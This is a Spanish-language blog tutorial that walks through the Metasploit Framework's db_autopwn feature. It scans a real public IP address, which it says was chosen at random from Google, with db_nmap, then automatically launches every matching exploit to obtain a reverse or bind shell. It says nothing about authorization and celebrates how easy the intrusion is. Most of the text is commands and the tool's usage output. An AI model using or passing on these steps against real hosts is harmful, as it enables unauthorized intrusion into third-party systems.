Bueno alguno de ustedes puede que ya conozcan el framework de metasploit y para los que no conozcan esta tool, les explicare.
El framework de metasploit es una suite de exploits y de herramientas de seguridad informatica, es una suite perfecta para las pruebas de pentest y para intruccionarse en sistemas.
¿De donde podemos descargar Metasploit Framework?
[+] metasploit framework para widnows 2000 hasta windows seven version 3.4.1
[+] metasploit framework para linux version 3.4.1
Aqui mas informacion sobre la descarga de Metasploit Framework
Bueno vamos a comenzar !!!
Una vez instalado el framework en el equipo vamos a realizar una actualizacion al framework. Para realizar eso utilizaremos el comando msfupdate.
Una vez muestre la revision, significa que ya esta actualizado completamente.
Ahora entraremos en la consola de comandos del metasploit ejecutando msfconsole.
Una vez adentro vamos a activar el plugin de sqlite el cual nos permitira crear la base de datos para realizar un autoataque, asi que para hacer eso escribiremos: db_driver sqlite3
Listo.
Una vez cargado el driver vamos a crear una base de datos para que se guarde toda la informacion, para ello ejecutaremos: db_create hack1
hack1 lo pueden cambiar por cualquier otro nombre.
Creada la base de datos procedemos a realizar el scanneo con nmap y a guardarlo en la base de datos.
Para eso ejecutamos: db_nmap -sS -sV -PN 67.228.192.227
recuerden 67.228.192.227 se cambia por la ip que quieren scannear, esta ip es escogida al azar por google.
Bueno una vez scanneado el host, el resultado se guarda automaticamente en la base de datos creada anteriormente. Ahora vamos a coger los exploits de cada puerto y los vamos a probar todos.
Aunque eso no lo hacemos nosotros se hara automaticamente con la opcion db_autopwn y cuando salga la shell simplemente nos dara el acceso. Bonito cierto ??
Bueno para hacer eso ejecutaremos: db_autopwn -p -e -t -s -r -b
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
Ya con esto solo nos queda esperar la shell. Facilito cierto ??
Gracias a los de metasploit por esta gran tool y espero les guste el tuto.
Foro de discusion: Autoatack – Metasploit
Pagina principal de Metasploit Framework: Metasploit Framework
"
No hay comentarios:
Publicar un comentario